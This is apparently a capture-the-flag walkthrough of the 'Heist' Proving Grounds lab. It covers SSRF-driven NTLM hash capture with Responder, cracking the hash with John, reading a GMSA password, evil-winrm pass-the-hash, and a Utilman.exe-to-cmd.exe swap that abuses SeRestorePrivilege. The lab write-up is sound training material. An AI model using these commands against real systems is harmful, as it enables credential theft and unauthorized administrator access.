Proving Grounds Practice box Heist is rated hard by Offsec, but the community disagrees and rated it very hard. I originally saw this box on TJ Null’s OSCP prep list for Active Directory practice, and I would have to agree that it is great practice. The box starts out with a SSRF vulnerability in the web application, then leveraging GMSA to escalate privileges, and finishing it off with SeRestorePrivilege to escalate to Administrator. With that being said, let’s crack into the box.

— NMAP Scan

makoyi@kali 27/03/26 11:02 [~] 
❯ sudo nmap -Pn -n 192.168.148.165 -sC -sV -p- --open
[sudo] password for makoyi: 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 11:02 -0500
Nmap scan report for 192.168.148.165
Host is up (0.14s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-27 16:09:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HEIST
|   NetBIOS_Domain_Name: HEIST
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: heist.offsec
|   DNS_Computer_Name: DC01.heist.offsec
|   DNS_Tree_Name: heist.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2026-03-27T16:10:01+00:00
|_ssl-date: 2026-03-27T16:10:40+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2026-03-26T16:00:07
|_Not valid after:  2026-09-25T16:00:07
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49765/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2026-03-27T16:10:03
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 504.87 seconds

The web server on port 8080 was the first thing that stood out to me, with nothing else in the scan standing out too much, I navigated to the web page.

Now that looks interesting. I started a python server and input my IP address into the input field, to see what would happen.

Ok, well that’s a good sign that we can take advantage of the web application. After a bunch of trial and error attempting to gain reverse shells from various payloads and failing, I decided to pivot and set up responder, to see if there was any other information being sent.

makoyi@kali 27/03/26 11:29 [~] 
❯ sudo responder -I tun0

Alright! Pivoting seemed to work and gave us an NTLM hash that we can use John the Ripper to crack.

makoyi@kali 27/03/26 11:34 [~] 
❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash  
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
california       (enox)     
1g 0:00:00:00 DONE (2026-03-27 11:34) 100.0g/s 204800p/s 204800c/s 204800C/s 123456..lovers1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Now that we have a username and a password, let’s see what we can do with it. I started by enumerated smb to see if the password would work, and success!

There wasn’t anything too interesting at first glance in the smb shares, so I decided to see if the credentials could be used for any other services. I started with winrm with some wishful thinking, and look at that, it works.

Now that we’re logged in and grabbed our local.txt file, it’s time to see if we can escalate to a higher account. After awhile of searching for a path, checking whoami /priv, checking SPN, and attempting to use PowerUp.ps1, the most I could find is that there’s another account named svc_apache$. I figured that at this point, I should go ahead and use bloodhound to see if it can help me find a target path.

makoyi@kali 27/03/26 11:52 [~] 
❯ bloodhound-python -d heist.offsec -u 'enox' -p 'california' -dc '192.168.148.165' -c all

The first thing I like to do after adding the account to owned, is to check what outbound controls the account has.

Looks like enox is a member of the web admins group with ReadGMSAPassword of the svc_apache$ user. I decided to use bloodhound’s suggested way of using windows, so I downloaded a precompiled GMSAPasswordReader and used it to grab the rc4 hash of svc_apache$.

Now, we pass the hash using evil-winrm and check our privileges, to see what we can do.

SeRestorePrivileges is an interesting find, but I’m going to keep looking around to see if there’s anything else interesting.

Well, that didn’t take long to find something interesting, it was inside the directory we logged into. By using cat on the file, it gives a helpful hint on how to escalate our privileges using SeRestore. By going to the github address listed, it gives us step by step instructions on how to abuse SeRestore.

Using evil-winrm, we follow along with the steps.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> cd C:\Windows\System32
*Evil-WinRM* PS C:\Windows\System32> ren Utilman.exe Utilman.old
*Evil-WinRM* PS C:\Windows\System32> ren cmd.exe Utilman.exe

Now, we use rdesktop

rdesktop 192.168.148.165

Once it has booted up, we press Windows + U to open a command terminal as Administrator.

Thank you for reading!

I hope this walk-through helps, stay ethical, and happy hacking.